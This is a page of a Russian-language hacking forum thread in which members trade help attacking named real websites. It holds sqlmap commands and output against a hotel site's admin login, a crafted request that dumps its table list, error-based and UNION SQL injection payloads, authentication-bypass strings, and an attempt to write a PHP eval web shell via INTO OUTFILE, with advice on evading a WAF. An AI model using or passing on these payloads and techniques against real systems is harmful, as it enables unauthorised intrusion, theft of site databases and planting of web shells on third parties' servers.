PDA

Просмотр полной версии : Ваши вопросы по уязвимостям.


Страницы : 1 [2] 3 4 5 6 7 8 9 10 11 12

BigBear
23.06.2015, 15:25
reuvenmatbil said:
↑ (https://antichat.live/posts/3861651/)
при запуске sqlmap с параметром --os-shell
выдает
[06:35:40] [INFO] calling Windows OS shell. To quit type 'x' or 'q' and press ENTER
os-shell>
как дальше действовать чтоб получить доступ, какие команды существуют?
права на запись есть


select '' into outfile '/[full_path]/x.php';

Muracha
23.06.2015, 15:36
Почему на другую версию движка запрос типа


Code:
"-u "www.bogema-hotel.ru/access_admin.php" --eta --random-agent --threads=8 --level=5 --union-cols=1-66 --dbms="MySQL" --technique=EBU --current-db --data="auth_login=1*&auth_pass=g00dPa%24%24w0rD&auth_typ=on"

записает на идеинтичном запросе?

В прошлый раз на прошлом сайте получилось выдернуть логин и пароль, а тут блок какой-то..


Code:
"
sqlmap.py -u "http://www.bogema-hotel.ru" --eta --random-agent
--threads=8 --level=5 --union-cols=1-66 --dbms="MySQL" --technique=EBU --curr
ent-db --column --data="auth_login=1*&auth_pass=g00dPa%24%24w0rD&auth_typ=on"
_
___ ___| |_____ ___ ___ {1.0-dev-nongit-20150622}
|_ -| . | | | .'| . |
|___|_ |_|_|_|_|__,| _|
|_| |_| http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual
consent is illegal. It is the end user's responsibility to obey all applicable
local, state and federal laws. Developers assume no liability and are not respon
sible for any misuse or damage caused by this program

starting at 15:24:53

[15:24:53] [INFO] fetched random HTTP User-Agent header from file '
indows; U; Windows NT 6.1; zh-TW; rv:1.9.2.13) Gecko/20101203 AskTbPTV/3.9.1.140
19 Firefox/3.6.13'
custom injection marking character ('*') found in option '--data'. Do you want t
o process it? [Y/n/q] n
[15:24:56] [INFO] testing connection to the target URL
[15:24:56] [INFO] heuristics detected web page charset 'windows-1251'
[15:24:56] [INFO] testing if the target URL is stable. This can take a couple of
seconds
[15:24:57] [INFO] target URL is stable
[15:24:57] [INFO] testing if POST parameter 'auth_login' is dynamic
[15:24:57] [WARNING] POST parameter 'auth_login' does not appear dynamic
[15:24:58] [WARNING] heuristic (basic) test shows that POST parameter 'auth_logi
n' might not be injectable
[15:24:58] [INFO] testing for SQL injection on POST parameter 'auth_login'
[15:24:58] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[15:25:30] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (Gen
eric comment)'
[15:26:02] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MyS
QL comment)'
[15:26:34] [INFO] testing 'MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDE
R BY or GROUP BY clause'
[15:27:07] [INFO] testing 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER
BY or GROUP BY clause (MAKE_SET)'
[15:27:38] [INFO] testing 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER
BY or GROUP BY clause (ELT)'
[15:28:11] [INFO] testing 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER
BY or GROUP BY clause (bool*int)'
[15:28:43] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'

[15:28:43] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace
(original value)'
[15:28:44] [INFO] testing 'MySQL = 5.0 boolean-based blind - ORDER BY, GROUP BY
clause'
[15:28:49] [WARNING] reflective value(s) found and filtering out
[15:28:50] [INFO] testing 'MySQL >= 5.0 boolean-based blind - ORDER BY, GROUP BY
clause (original value)'
[15:28:51] [INFO] testing 'MySQL = 5.0 boolean-based blind - Stacked queries'
[15:29:25] [INFO] testing 'MySQL = 5.0 AND error-based - WHERE, HAVING, ORDER B
Y or GROUP BY clause'
[15:30:06] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER B
Y or GROUP BY clause (EXTRACTVALUE)'
[15:30:15] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER B
Y or GROUP BY clause (UPDATEXML)'
[15:30:24] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER B
Y or GROUP BY clause (BIGINT UNSIGNED)'
[15:30:34] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER B
Y or GROUP BY clause'
[15:30:43] [INFO] testing 'MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACT
VALUE)'
[15:30:52] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[15:30:52] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACT
VALUE)'
[15:30:53] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (UPDATEX
ML)'
[15:30:53] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (BIGINT
UNSIGNED)'
[15:30:53] [INFO] testing 'MySQL >= 5.0 error-based - ORDER BY, GROUP BY clause'

[15:30:53] [INFO] testing 'MySQL >= 5.1 error-based - ORDER BY, GROUP BY clause
(EXTRACTVALUE)'
[15:30:54] [INFO] testing 'MySQL >= 5.1 error-based - ORDER BY, GROUP BY clause
(UPDATEXML)'
[15:30:54] [INFO] testing 'MySQL >= 5.5 error-based - ORDER BY, GROUP BY clause
(BIGINT UNSIGNED)'
[15:30:54] [INFO] testing 'MySQL >= 4.1 error-based - ORDER BY, GROUP BY clause'

[15:30:55] [INFO] testing 'Generic UNION query (NULL) - 1 to 66 columns (custom)
'"

faza02
23.06.2015, 16:05
Muracha said:
↑ (https://antichat.live/posts/3861670/)
Почему на другую версию движка запрос типа

Code:
"-u "www.bogema-hotel.ru/access_admin.php" --eta --random-agent --threads=8 --level=5 --union-cols=1-66 --dbms="MySQL" --technique=EBU --current-db --data="auth_login=1*&auth_pass=g00dPa%24%24w0rD&auth_typ=on"

записает на идеинтичном запросе?
В прошлый раз на прошлом сайте получилось выдернуть логин и пароль, а тут блок какой-то..

Code:
"
sqlmap.py -u "http://www.bogema-hotel.ru" --eta --random-agent
--threads=8 --level=5 --union-cols=1-66 --dbms="MySQL" --technique=EBU --curr
ent-db --column --data="auth_login=1*&auth_pass=g00dPa%24%24w0rD&auth_typ=on"
_
___ ___| |_____ ___ ___ {1.0-dev-nongit-20150622}
|_ -| . | | | .'| . |
|___|_ |_|_|_|_|__,| _|
|_| |_| http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual
consent is illegal. It is the end user's responsibility to obey all applicable
local, state and federal laws. Developers assume no liability and are not respon
sible for any misuse or damage caused by this program

starting at 15:24:53

[15:24:53] [INFO] fetched random HTTP User-Agent header from file '
indows; U; Windows NT 6.1; zh-TW; rv:1.9.2.13) Gecko/20101203 AskTbPTV/3.9.1.140
19 Firefox/3.6.13'
custom injection marking character ('*') found in option '--data'. Do you want t
o process it? [Y/n/q] n
[15:24:56] [INFO] testing connection to the target URL
[15:24:56] [INFO] heuristics detected web page charset 'windows-1251'
[15:24:56] [INFO] testing if the target URL is stable. This can take a couple of
seconds
[15:24:57] [INFO] target URL is stable
[15:24:57] [INFO] testing if POST parameter 'auth_login' is dynamic
[15:24:57] [WARNING] POST parameter 'auth_login' does not appear dynamic
[15:24:58] [WARNING] heuristic (basic) test shows that POST parameter 'auth_logi
n' might not be injectable
[15:24:58] [INFO] testing for SQL injection on POST parameter 'auth_login'
[15:24:58] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[15:25:30] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (Gen
eric comment)'
[15:26:02] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MyS
QL comment)'
[15:26:34] [INFO] testing 'MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDE
R BY or GROUP BY clause'
[15:27:07] [INFO] testing 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER
BY or GROUP BY clause (MAKE_SET)'
[15:27:38] [INFO] testing 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER
BY or GROUP BY clause (ELT)'
[15:28:11] [INFO] testing 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER
BY or GROUP BY clause (bool*int)'
[15:28:43] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'

[15:28:43] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace
(original value)'
[15:28:44] [INFO] testing 'MySQL = 5.0 boolean-based blind - ORDER BY, GROUP BY
clause'
[15:28:49] [WARNING] reflective value(s) found and filtering out
[15:28:50] [INFO] testing 'MySQL >= 5.0 boolean-based blind - ORDER BY, GROUP BY
clause (original value)'
[15:28:51] [INFO] testing 'MySQL = 5.0 boolean-based blind - Stacked queries'
[15:29:25] [INFO] testing 'MySQL = 5.0 AND error-based - WHERE, HAVING, ORDER B
Y or GROUP BY clause'
[15:30:06] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER B
Y or GROUP BY clause (EXTRACTVALUE)'
[15:30:15] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER B
Y or GROUP BY clause (UPDATEXML)'
[15:30:24] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER B
Y or GROUP BY clause (BIGINT UNSIGNED)'
[15:30:34] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER B
Y or GROUP BY clause'
[15:30:43] [INFO] testing 'MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACT
VALUE)'
[15:30:52] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[15:30:52] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACT
VALUE)'
[15:30:53] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (UPDATEX
ML)'
[15:30:53] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (BIGINT
UNSIGNED)'
[15:30:53] [INFO] testing 'MySQL >= 5.0 error-based - ORDER BY, GROUP BY clause'

[15:30:53] [INFO] testing 'MySQL >= 5.1 error-based - ORDER BY, GROUP BY clause
(EXTRACTVALUE)'
[15:30:54] [INFO] testing 'MySQL >= 5.1 error-based - ORDER BY, GROUP BY clause
(UPDATEXML)'
[15:30:54] [INFO] testing 'MySQL >= 5.5 error-based - ORDER BY, GROUP BY clause
(BIGINT UNSIGNED)'
[15:30:54] [INFO] testing 'MySQL >= 4.1 error-based - ORDER BY, GROUP BY clause'

[15:30:55] [INFO] testing 'Generic UNION query (NULL) - 1 to 66 columns (custom)
'"



значит нужно подобрать вектор вручную и посмотреть, что не так


man4747 said:
↑ (https://antichat.live/posts/3861660/)
Помогите, пожалуйста.
http://www.arbet.am/search.php?CategoryID=1'a (http://www.arbet.am/search.php?CategoryID=1%27a)




Code:
http://www.arbet.am/search.php?CategoryID=1|extractvalue(1,concat(0x3a ,version()))

grimnir
23.06.2015, 19:51
Muracha said:
↑ (https://antichat.live/posts/3861670/)
Почему на другую версию движка запрос типа


Потому что там запрос другой multipart

создаете файл request.txt в него код


Code:
POST /access_admin.php HTTP/1.1
Content-Length: 586
Content-Type: multipart/form-data; boundary=----Exploit_Code
Cookie: PHPSESSID=e2fa5bb7d6518aa7b7f3a206febdcff0
Host: www.bogema-hotel.ru
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*

------Exploit_Code
Content-Disposition: form-data; name="authorize"

1
------Exploit_Code
Content-Disposition: form-data; name="login"

1*
------Exploit_Code
Content-Disposition: form-data; name="password"

g00dPa$$w0rD
------Exploit_Code--

дальше python.exe "путь_до\sql\sqlmap.py" -r "путь_до\sql\request.txt" --eta --random-agent --threads=10 --level=5 --union-cols=1-66 --dbms="MySQL" --technique=E --dbs

Database: ironlogix_bgmh

[24 tables]

+------------------------------+

| SS_aux |

| SS_brand |

| SS_categories |

| SS_category_product |

| SS_currency_types |

| SS_customers |

| SS_manager |

| SS_manager_dany |

| SS_news |

| SS_order_status |

| SS_ordered_carts |

| SS_orders |

| SS_pages |

| SS_payment |

| SS_payoption |

| SS_product_options |

| SS_product_options_values |

| SS_products |

| SS_products_opt_val_variants |

| SS_review |

| SS_share |

| SS_special_offers |

| SS_tags |

| SS_thumb |

+------------------------------+

Muracha
24.06.2015, 13:14
Есть форум http://forum.chindirchero.ru/

В поле обновления по адресу "http://forum.chindirchero.ru/upgrade/"

Если вбить \1\ и \1\ появляется ошибка:


Code:
SELECT m.*, g.* FROM ibf_members m LEFT JOIN ibf_groups g ON (g.g_id=m.mgroup) WHERE LOWER(name)='\1\'

Ñîîáùåíèå ñåðâåðà: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''\1\'' at line 1
Êîä îøèáêè: 1064
Âðåìÿ: Wednesday 24th o June 2015 12:04:17 PM

Можно ли с помощью sqlmap выдернуть данные?

При составлении запроса и корректировки у меня sqlmap ругался на следующее и писал 404

Может, я неправильно составил запрос?


Code:
indows; U; Windows NT 6.0; en-US; rv:1.9.2.4) Gecko/20100527 Firefox/3.6.4 (.NET
CLR 3.5.30729)'
Multipart-like data found in POST data. Do you want to process it? [Y/n/q] Y
[13:11:29] [INFO] testing connection to the target URL
[13:11:29] [CRITICAL] page not found (404)
it is not recommended to continue in this kind of cases. Do you want to quit and
make sure that everything is set up properly? [Y/n] Y
[13:11:30] [WARNING] HTTP error codes detected during run:
404 (Not Found) - 1 times



Code:
POST /index.php HTTP/1.1
Content-Length: 586
Content-Type: multipart/form-data; boundary=----Exploit_Code
Cookie: PHPSESSID=e2fa5bb7d6518aa7b7f3a206febdcff0
Host: www.forum.chindirchero.ru/upgrade/index.php
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*

------Exploit_Code
Content-Disposition: form-data; name="username"

\1\
------Exploit_Code
Content-Disposition: form-data; name="username"

\1\
------Exploit_Code
Content-Disposition: form-data; name="password"

g00dPa$$w0rD
------Exploit_Code--

BigBear
24.06.2015, 14:07
Ну давай рассмотрим запрос:


Code:
SELECT m.*, g.* FROM ibf_members m LEFT JOIN ibf_groups g ON (g.g_id=m.mgroup) WHERE LOWER(name)='\1\'


Ругается на незакрытую кавычку, так как обратный слэш экранирует кавычку, подставляемую по умолчанию.

Можно ли пропихнуть свой пэйлоад? Теоретически можно, если:

1) У тебя есть второй параметр в запросе, который мы можем контролировать. То есть первым параметром мы экранируем кавычку, превращая дальнейший запрос в строковое значение, а вторым параметром прокидываем свою нагрузку.

У тебя в запросе участвует только одна переменная, поэтому это - не наш случай.

Значит нужно пытаться дополнить запрос в рамках одной переменной.

Но для этого, нам надо закрыть первую кавычку.

2) Обязательным условием должно являться, чтобы кавычка не преобразовывалась, а проходила в чистом виде.

Проверяем:

123'\

Response


Code:
SELECT m.*, g.* FROM ibf_members m LEFT JOIN ibf_groups g ON (g.g_id=m.mgroup) WHERE LOWER(name)='123'\'

Как видим, кавычка энкодится. Тухлый вариант.

Самый максимум этой баги - узнать текущий префикс к таблицам.

faza02
24.06.2015, 20:13
Muracha said:
↑ (https://antichat.live/posts/3861414/)
сайт
http://www.bogema-hotel.ru/access_admin.php
- с уязвимой админкой.
Вставляю в login "admin ' or '1' =1/*" Перебираю варианты - ' or '1' =1-- но результата не достигаю.
Спустя час решил написать сюда.
Почему так? Фильтрация или неверно заданный запрос? Хотя делал все по авторской статье.


разобрался, в чем проблема.


Code:
SELECT manager, password from SS_manager

NULL. из-за того, что записей нет и не возможно залогиниться даже обойдя авторизацию.

XAMEHA
25.06.2015, 10:09
yarbabin said:
↑ (https://antichat.live/posts/3862039/)
разобрался, в чем проблема.

Code:
SELECT manager, password from SS_manager

NULL. из-за того, что записей нет и не возможно залогиниться даже обойдя авторизацию.


Да разве? Как сказал kingbeef, можно использовать error-based векторы. С помощью них можно увидеть записи воочию.

Обойти авторизацию подстановками вроде ' or 1=1 # не получается из-за того, что в запросе участвует только поле login. Соответствие паролей проверяет php скрипт. Варианты:


Вывести записи и подставить их в форму.

Если записей действительно нет, или в них присутствуют непробиваемые хэши, подставить с помощью UNION свои и ввести в поле пароля соответствующий пароль.

grimnir
25.06.2015, 11:18
XAMEHA said:
↑ (https://antichat.live/posts/3862154/)
присутствуют непробиваемые хэши, подставить с помощью UNION свои и ввести в поле пароля соответствующий пароль.


я правильно понял, что такое сработает только при наличии соответствующих прав?

XAMEHA
25.06.2015, 13:24
grimnir said:
↑ (https://antichat.live/posts/3862171/)
я правильно понял, что такое сработает только при наличии соответствующих прав?


Нет, это сработает, если помимо авторизации админка взаимодействует с таблицей пользователей по минимуму. Пример запроса:


Code:
SELECT id, login, pass, priv FROM user WEHRE name = '*'

login = ' UNION SELECT 1, 'admin', md5('1234'), 1 #
pass = 1234

Проблема выше (Muracha'а) решается простым выводом данных.

Unknowhacker
28.06.2015, 12:54
Начнём с того, что у root есть права на запись и полный путь.

Фильтр стоял на операторе select, но я его обошёл. Выполняю запрос:


Code:
ttp://www.angloeasterngroup.com/careers/index.php?parentId=3&careerId=3%27+union+/*!select*/+1,2,3,4,%27%3C?php%20eval%28$_REQUEST[cmd]%29;%20?%3E%27,6,7,8,9,10+from+mysql.user+into+out file+%27C:\xampp\htdocs\cms\shell.php%27+--+ - сброс соеденяния
http://www.angloeasterngroup.com/shell.php?cmd=ls;wget...

================================================== ============

SQL

После кавычки всё слешируется


Code:
http://gordonua.com/search.html?s[text]='

XAMEHA
28.06.2015, 18:31
Unknowhacker,


Сброс соединения свидетельствует о том, что вы опять нарвались на WAF. Попробуйте обойти.

Для правильной передачи строки экранируйте содержимое:

'C:\xampp\htdocs\cms\shell.php' => 'C:\\xampp\\htdocs\\cms\\shell.php'

Посылаете ls и wget в eval? Серьезно?

Не забудьте убедиться, что ваши пути - искомые, даже если вы их получили с помощью раскрытия путей.

По умолчанию в XAMPP пустьC:\xampp\htdocs\, а не C:\xampp\htdocs\cms\.

https://forum.antichat.net/threads/424557/page-13#post-3861933

Xsite
28.06.2015, 21:39
Ребят подскажите пожалуйста

нашел скулю ,не могу раскрутить мепом


Code:
POST /account/doLogin HTTP/1.1
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.170 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://chatgirl.nl
Referer: http://chatgirl.nl/account/
Accept-Language: en-us,en;q=0.5
Host: chatgirl.nl
Cookie: __cfduid=d90bad96b9df60b454800378893a111ae14355093 09; saved_gender_id=11; saved_interest_id=11; saved_region_id=city_611225; saved_nickname=NSFTW
Accept-Encoding: gzip, deflate
Content-Length: 442
Content-Type: application/x-www-form-urlencoded

nickname=&gender_id=-1+or+1%3d1+and+(SELECT+1+and+ROW(1%2c1)%3e(SELECT+ COUNT(*)%2cCONCAT(CHAR(95)%2cCHAR(33)%2cCHAR(64)%2 cCHAR(52)%2cCHAR(100)%2cCHAR(105)%2cCHAR(108)%2cCH AR(101)%2cCHAR(109)%2cCHAR(109)%2cCHAR(97)%2c0x3a% 2cFLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.COLLA TIONS+GROUP+BY+x)a)&region_id=city_2466&cv=Geef+hier+een+omschrijving+van+jezelf.&coupon%5B%5D=&username=&password=&screen_resolution=800x400&os=Windows&screen_size=medium

При команде

sqlmap -u "http://chatgirl.nl/account/doLogin" --data="nickname=&gender_id=1*&region_id=city_2466&cv=Geef+hier+een+omschrijving+van+jezelf.&coupon%5B%5

D=&username=&password=&screen_resolution=800x400&os=Windows&screen_size=medium" --random-agent --level 5 --technique=EU --dbms=MySQL

Меп редиректит на другую страницу


Code:
[19:48:08] [INFO] fetched random HTTP User-Agent header from file 'D:\Pentest\Sql_inj\PentestBox\bin\WebApplications \sqlmap\txt\user-agents.txt': 'Mozilla/5.0 (X11; U; Linux i686; de; rv:1.9.1.8) Gecko/20100214 Ubuntu/9.10 (karmic) Firefox/3.5.8'
custom injection marking character ('*') found in option '--data'. Do you want to process it? [Y/n/q]
[19:48:14] [INFO] testing connection to the target URL
sqlmap got a 302 redirect to 'http://chatgirl.nl/welcome/chat_closed'. Do you want to follow? [Y/n] n
[19:48:18] [WARNING] heuristic (basic) test shows that (custom) POST parameter '#1*' might not be injectable
[19:48:19] [INFO] testing for SQL injection on (custom) POST parameter '#1*'
[19:48:19] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[19:48:31] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[19:48:43] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[19:48:55] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[19:49:06] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[19:49:19] [INFO] testing 'MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE)'
[19:49:30] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[19:49:30] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACTVALUE)'
[19:49:30] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)'
[19:49:30] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (BIGINT UNSIGNED)'
[19:49:32] [INFO] testing 'MySQL >= 5.0 error-based - ORDER BY, GROUP BY clause'
[19:49:32] [INFO] testing 'MySQL >= 5.1 error-based - ORDER BY, GROUP BY clause (EXTRACTVALUE)'
[19:49:32] [INFO] testing 'MySQL >= 5.1 error-based - ORDER BY, GROUP BY clause (UPDATEXML)'
[19:49:33] [INFO] testing 'MySQL >= 5.5 error-based - ORDER BY, GROUP BY clause (BIGINT UNSIGNED)'
[19:49:33] [INFO] testing 'MySQL >= 4.1 error-based - ORDER BY, GROUP BY clause'
[19:49:34] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[19:51:59] [INFO] testing 'Generic UNION query (random number) - 1 to 10 columns'
[19:54:21] [INFO] testing 'Generic UNION query (NULL) - 11 to 20 columns'
[19:56:29] [INFO] testing 'Generic UNION query (random number) - 11 to 20 columns'
[19:58:33] [INFO] testing 'Generic UNION query (NULL) - 21 to 30 columns'
[20:00:50] [INFO] testing 'Generic UNION query (random number) - 21 to 30 columns'
[20:03:04] [INFO] testing 'Generic UNION query (NULL) - 31 to 40 columns'
[20:04:54] [INFO] heuristics detected web page charset 'ascii'
[20:04:54] [WARNING] reflective value(s) found and filtering out
[20:04:54] [INFO] target URL appears to be UNION injectable with 40 columns
injection not exploitable with NULL values. Do you want to try with a random integer value for option '--union-char'? [Y/n]
[20:08:10] [INFO] testing 'Generic UNION query (20) - 41 to 50 columns'
[20:17:02] [INFO] testing 'MySQL UNION query (20) - 1 to 10 columns'
[20:23:11] [INFO] testing 'MySQL UNION query (20) - 11 to 20 columns'
[20:25:14] [INFO] testing 'MySQL UNION query (20) - 21 to 30 columns'
[20:27:10] [INFO] testing 'MySQL UNION query (20) - 31 to 40 columns'
[20:29:03] [INFO] testing 'MySQL UNION query (20) - 41 to 50 columns'
[20:31:04] [WARNING] (custom) POST parameter '#1*' is not injectable

хотя скуля есть http://hkar.ru/C3YA

В чем может быть проблема ?

OxoTnik
28.06.2015, 22:02
Xsite said:
↑ (https://antichat.live/posts/3863272/)
Ребят подскажите пожалуйста
нашел скулю ,не могу раскрутить мепом
POST /account/doLogin HTTP/1.1
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.170 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin:
http://chatgirl.nl
Referer:
http://chatgirl.nl/account/
Accept-Language: en-us,en;q=0.5
Host: chatgirl.nl
Cookie: __cfduid=d90bad96b9df60b454800378893a111ae14355093 09; saved_gender_id=11; saved_interest_id=11; saved_region_id=city_611225; saved_nickname=NSFTW
Accept-Encoding: gzip, deflate
Content-Length: 442
Content-Type: application/x-www-form-urlencoded
nickname=&gender_id=-1+or+1%3d1+and+(SELECT+1+and+ROW(1%2c1)%3e(SELECT+ COUNT(*)%2cCONCAT(CHAR(95)%2cCHAR(33)%2cCHAR(64)%2 cCHAR(52)%2cCHAR(100)%2cCHAR(105)%2cCHAR(108)%2cCH AR(101)%2cCHAR(109)%2cCHAR(109)%2cCHAR(97)%2c0x3a% 2cFLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.COLLA TIONS+GROUP+BY+x)a)&region_id=city_2466&cv=Geef+hier+een+omschrijving+van+jezelf.&coupon%5B%5D=&username=&password=&screen_resolution=800x400&os=Windows&screen_size=medium
При команде
sqlmap -u "
http://chatgirl.nl/account/doLogin
" --data="nickname=&gender_id=1*&region_id=city_2466&cv=Geef+hier+een+omschrijving+van+jezelf.&coupon%5B%5
D=&username=&password=&screen_resolution=800x400&os=Windows&screen_size=medium" --random-agent --level 5 --technique=EU --dbms=MySQL
Меп редиректит на другую страницу
[19:48:08] [INFO] fetched random HTTP User-Agent header from file 'D:\Pentest\Sql_inj\PentestBox\bin\WebApplications \sqlmap\txt\user-agents.txt': 'Mozilla/5.0 (X11; U; Linux i686; de; rv:1.9.1.8) Gecko/20100214 Ubuntu/9.10 (karmic) Firefox/3.5.8'
custom injection marking character ('*') found in option '--data'. Do you want to process it? [Y/n/q]
[19:48:14] [INFO] testing connection to the target URL
sqlmap got a 302 redirect to '
http://chatgirl.nl/welcome/chat_closed
'. Do you want to follow? [Y/n] n
[19:48:18] [WARNING] heuristic (basic) test shows that (custom) POST parameter '#1*' might not be injectable
[19:48:19] [INFO] testing for SQL injection on (custom) POST parameter '#1*'
[19:48:19] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[19:48:31] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[19:48:43] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[19:48:55] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[19:49:06] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[19:49:19] [INFO] testing 'MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE)'
[19:49:30] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[19:49:30] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACTVALUE)'
[19:49:30] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)'
[19:49:30] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (BIGINT UNSIGNED)'
[19:49:32] [INFO] testing 'MySQL >= 5.0 error-based - ORDER BY, GROUP BY clause'
[19:49:32] [INFO] testing 'MySQL >= 5.1 error-based - ORDER BY, GROUP BY clause (EXTRACTVALUE)'
[19:49:32] [INFO] testing 'MySQL >= 5.1 error-based - ORDER BY, GROUP BY clause (UPDATEXML)'
[19:49:33] [INFO] testing 'MySQL >= 5.5 error-based - ORDER BY, GROUP BY clause (BIGINT UNSIGNED)'
[19:49:33] [INFO] testing 'MySQL >= 4.1 error-based - ORDER BY, GROUP BY clause'
[19:49:34] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[19:51:59] [INFO] testing 'Generic UNION query (random number) - 1 to 10 columns'
[19:54:21] [INFO] testing 'Generic UNION query (NULL) - 11 to 20 columns'
[19:56:29] [INFO] testing 'Generic UNION query (random number) - 11 to 20 columns'
[19:58:33] [INFO] testing 'Generic UNION query (NULL) - 21 to 30 columns'
[20:00:50] [INFO] testing 'Generic UNION query (random number) - 21 to 30 columns'
[20:03:04] [INFO] testing 'Generic UNION query (NULL) - 31 to 40 columns'
[20:04:54] [INFO] heuristics detected web page charset 'ascii'
[20:04:54] [WARNING] reflective value(s) found and filtering out
[20:04:54] [INFO] target URL appears to be UNION injectable with 40 columns
injection not exploitable with NULL values. Do you want to try with a random integer value for option '--union-char'? [Y/n]
[20:08:10] [INFO] testing 'Generic UNION query (20) - 41 to 50 columns'
[20:17:02] [INFO] testing 'MySQL UNION query (20) - 1 to 10 columns'
[20:23:11] [INFO] testing 'MySQL UNION query (20) - 11 to 20 columns'
[20:25:14] [INFO] testing 'MySQL UNION query (20) - 21 to 30 columns'
[20:27:10] [INFO] testing 'MySQL UNION query (20) - 31 to 40 columns'
[20:29:03] [INFO] testing 'MySQL UNION query (20) - 41 to 50 columns'
[20:31:04] [WARNING] (custom) POST parameter '#1*' is not injectable
хотя скуля есть
http://hkar.ru/C3YA
В чем может быть проблема ?


Ты забыл указать параметр для проверки

например -p "gender_id"

ставишь значения --data="пост данные" -p "gender_id"

Xsite
28.06.2015, 22:08
OxoTnik said:
↑ (https://antichat.live/posts/3863280/)
Ты забыл указать параметр
например -p "gender_id"
ставишь значения --data="пост данные" -p "gender_id"


Параметр на который идет "атака" ,указан * ,тобишь можно без -p

Добавил ,--risk 3


Code:
